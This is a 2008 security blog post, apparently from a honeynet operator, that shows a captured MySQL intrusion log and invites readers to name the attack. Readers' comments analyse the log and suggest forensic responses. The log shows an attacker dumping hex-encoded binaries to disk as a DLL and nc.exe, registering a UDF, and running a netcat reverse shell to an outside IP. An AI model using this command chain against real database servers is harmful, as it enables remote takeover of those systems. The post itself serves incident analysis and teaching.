Wednesday, March 26, 2008

Name that hack

Today my honeynet was the victim of an oldie but goodie. It's time to play "NAME THAT HACK". What do you think is happening here?

A...
5.0.45-community-nt.^!..u"G|_G${.,.................c]+Yba?Ti4d{.
@..........@........................root....'NF.g".|Z/...=ao.nmysql.
...........
.....CREATE DATABASE nmxtmp
...........
.....USE nmxtmp
...........
/....CREATE TABLE cmd (codetab MEDIUMBLOB NOT NULL)
...........
( ...INSERT INTO cmd (codetab) VALUES ( 0x4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000e00000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000e5915857a1f03604a1f03604a1f0360449ef3d04a0f0360422ec3804aaf0360449ef3c0489f03604a1f0370498f03604c3ef2504a2f0360449ef2004a0f0360449ef3204a0f0360452696368a1f0360400000000000000000000000000000000504500004c010400a64156440000000000000000e0000e210b010600005000000030000000000000bd1100000010000000600000000000100010000000100000040000000100000004000000000000000090000000100000000000000200000000001000001000000000100000100000000000001000000060690000800000009c64000028000000000000000000000000000000000000000000000000000000008000007004000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000600000d80000000000000000000000000000000000000000000000000000002e74657874000000b840000000100000005000
0000100000000000000000000000000000200000602e72646174610000e009 [Truncated by me])
...........
5....SELECT * INTO DUMPFILE '..\\bin\\mycmd.dll' FROM cmd
......."...
?....CREATE FUNCTION cmd_execute RETURNS integer SONAME 'mycmd.dll'
...........
.....DROP TABLE cmd
...........
.....DROP DATABASE nmxtmp
...........
.....FLUSH LOGS
...........
.....CREATE DATABASE nmxtmp
...........
.....USE nmxtmp
...........
/....CREATE TABLE cmd (codetab MEDIUMBLOB NOT NULL)
...........
(....INSERT INTO cmd (codetab) VALUES ( 0x4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000800000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000504500004c010400b98eae340000000000000000e0000f010b010500009800000062000000000000004c00000010000000b0000000004000001000000002000004000000000000000400000000000000003001000004000000000000030000000000100000100000000010000010000000000000100000000000000000000000002001003c0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000a0210100640100000000000000000000000000000000000000000000000000002e7465787400000070970000001000000098000000040000000000000000000000000000200000602e726461746100001704000000b0000000060000009c0000000000000000000000000000400000402e646174610000004452000000c00000003e000000a200000000000000000000000000
00400000c02e696461746100005c070000002001000008000000e000 [truncated by me])
...........
3....SELECT * INTO DUMPFILE '..\\data\\nc.exe' FROM cmd
......."...
.....DROP TABLE cmd
...........
.....DROP DATABASE nmxtmp
...........
.....FLUSH LOGS
...........
D....SELECT cmd_execute('..\\data\\nc.exe 66.35.111.60 2095 -e cmd.exe')
.....R....def...cmd_execute('..\\data\\nc.exe 66.35.111.60 2095 -e cmd.exe')..?.........................537912269770588160.........
.....


Where would you begin your investigation?

3 comments:

Anonymous said...

Looking at the hex values, right up front what jumps out is 0x4d5a, or MZ in ascii. These look like dos executable files in hex. Also, these are mysql commands. Likely MySQL running on a windows system, or assumed to run on a windows system. Basically it looks like someone found an open mysql server with access to the root user who happens to have the 'FILE' privilege by default, thus the ability to output files.

The first file looks like a command library that'll be used with the cmd_execute function, something like cmd.exe, although from the snippet provided it doesn't match the cmd.exe from XP or Vista.

The second looks like a standard netcat listener that's set to listen on port 2095 and run a command shell. The attacker simply needs to connect to that port via netcat to have a command shell available. If the mycmd.dll allows privilege escalation somehow net nc.exe will be run as that, otherwise it'll be as SYSTEM or whatever the mysql server is running as.

I'd check to see if mysql is running on the system. Check to see if the mycmd.dll library exists, or the nc.exe file. See if those processes are running and dump them from memory. Check to see if the function 'cmd_execute' exists in memory.

Mr. Obnibolongo said...

Hi!
I've visited your blog a few times now and I've noticed that though your articles are *very* interesting there aren't many replies/comments. Anyway, I suppose you run a hit counter somewhere (too lazy to check that) but I thought I'd say "personally": THANK YOU for your postings :)

P.S.: I'd have stopped noticing the MySQL stuff :P

Anonymous said...

The 1st post has most of it correct. The netcat command is actually an outbound connection, and when it makes connection it will spawn the cmd.exe.

If the connection was live, the 1st thing I would decide is to either block it, or sniff it to determine what he was doing.

Next I would grab a WFT of the system. Memory analysis could also be helpful if the cmd.exe was the orgional one spawned. If I remember correctly, you should be able to see the command history.

Lastly you could start a MAC time analysis and build you case that way if live analysis is a dead end.

Love the blog. Keep up the good work.